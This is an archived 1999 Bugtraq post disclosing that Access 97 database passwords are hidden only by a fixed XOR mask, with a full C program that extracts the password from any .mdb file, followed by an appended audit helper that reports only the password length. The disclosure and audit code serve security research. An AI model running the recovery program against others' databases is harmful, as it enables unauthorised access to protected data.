Bugtraq mailing list archives
Re: Microsoft Access 97 Stores Database Password as Plaintext
From: jim () JTAN COM (Jim Paris)
Date: Tue, 9 Feb 1999 17:46:27 -0500
The following text was posted to USENET, and indexed on a Russian cypherpunk site. I found it when I was doing some work with Access 97 databases. I think you will agree that this particular "feature" makes the linked database password issue moot.
Most definitely!
Anyway, Access97 passwords are stored in the 13 bytes from offset 0x42 in a .mdb file. Do a bitwise XOR with 0x86, 0xFB, 0xEC, 0x37, 0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13 to recover the plaintext. I think that if the first byte is 0x86, the password is not checked.
Minor correction: the passwords can be a maximum of 14 bytes. The last XOR value is 0xD8. Here's a quick program to test this lack of security:

/* snip here */
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    FILE *mdb;
    int i;
    int ch;   /* int, so EOF from fgetc() can be told apart from data */
    /* XOR mask for the 14 password bytes */
    int secret[14] = {
        0x86, 0xFB, 0xEC, 0x37,
        0x5D, 0x44, 0x9C, 0xFA,
        0xC6, 0x5E, 0x28, 0xE6,
        0x13, 0xD8
    };

    if (argc < 2) {
        fprintf(stderr, "usage: %s filename.mdb\n", argv[0]);
        return 1;
    }
    if ((mdb = fopen(argv[1], "rb")) == NULL) {
        fprintf(stderr, "%s: can't open %s\n", argv[0], argv[1]);
        return 1;
    }

    /* the password field starts at offset 0x42 */
    fseek(mdb, 0x42, SEEK_SET);
    printf("The password is: ");
    for (i = 0; i < 14; i++) {
        if ((ch = fgetc(mdb)) == EOF)   /* file too short */
            break;
        if ((ch ^= secret[i]) == 0)     /* NUL ends the password */
            break;
        putchar(ch);
    }
    if (i == 0)
        printf("(none)");
    putchar('\n');
    fclose(mdb);
    return 0;
}
/* snip here */

-jim
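An added example, not part of the original post: an audit helper that reports whether an Access 97 file still relies on this masked header field, returning only the password length and never the password. The function names and the constructed sample headers are hypothetical; the offset, field size and mask are the ones quoted in the thread.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PW_OFFSET 0x42  /* field offset given in the thread */
#define PW_LEN    14    /* maximum password length given in the thread */

/* XOR mask quoted in the thread (13 bytes plus the corrected 14th, 0xD8). */
static const unsigned char pw_mask[PW_LEN] = {
    0x86, 0xFB, 0xEC, 0x37, 0x5D, 0x44, 0x9C, 0xFA,
    0xC6, 0x5E, 0x28, 0xE6, 0x13, 0xD8
};

/* Hypothetical helper: returns -1 if the buffer is too short to hold the
 * field, otherwise the length (0..14) of the database password that is set.
 * The password itself is never returned or printed. */
int mdb97_password_length(const unsigned char *hdr, size_t len)
{
    size_t i;
    if (hdr == NULL || len < PW_OFFSET + PW_LEN)
        return -1;
    for (i = 0; i < PW_LEN; i++)
        if ((hdr[PW_OFFSET + i] ^ pw_mask[i]) == 0)
            break;  /* NUL terminator, same stop rule as the loop above */
    return (int)i;
}

/* Constructed sample: a zeroed header whose field holds `pw`, masked. */
void make_sample_header(unsigned char *hdr, size_t len, const char *pw)
{
    size_t i, n = strlen(pw);
    memset(hdr, 0, len);
    for (i = 0; i < PW_LEN; i++)
        hdr[PW_OFFSET + i] = (unsigned char)((i < n ? pw[i] : 0) ^ pw_mask[i]);
}

int main(void)
{
    unsigned char hdr[128];
    make_sample_header(hdr, sizeof hdr, "");
    printf("no password:  length %d\n", mdb97_password_length(hdr, sizeof hdr));
    make_sample_header(hdr, sizeof hdr, "example");
    printf("password set: length %d, protected only by the fixed mask\n",
           mdb97_password_length(hdr, sizeof hdr));
    return 0;
}
```

A nonzero result marks a file whose contents should be protected by file-system permissions or real encryption rather than by the database password.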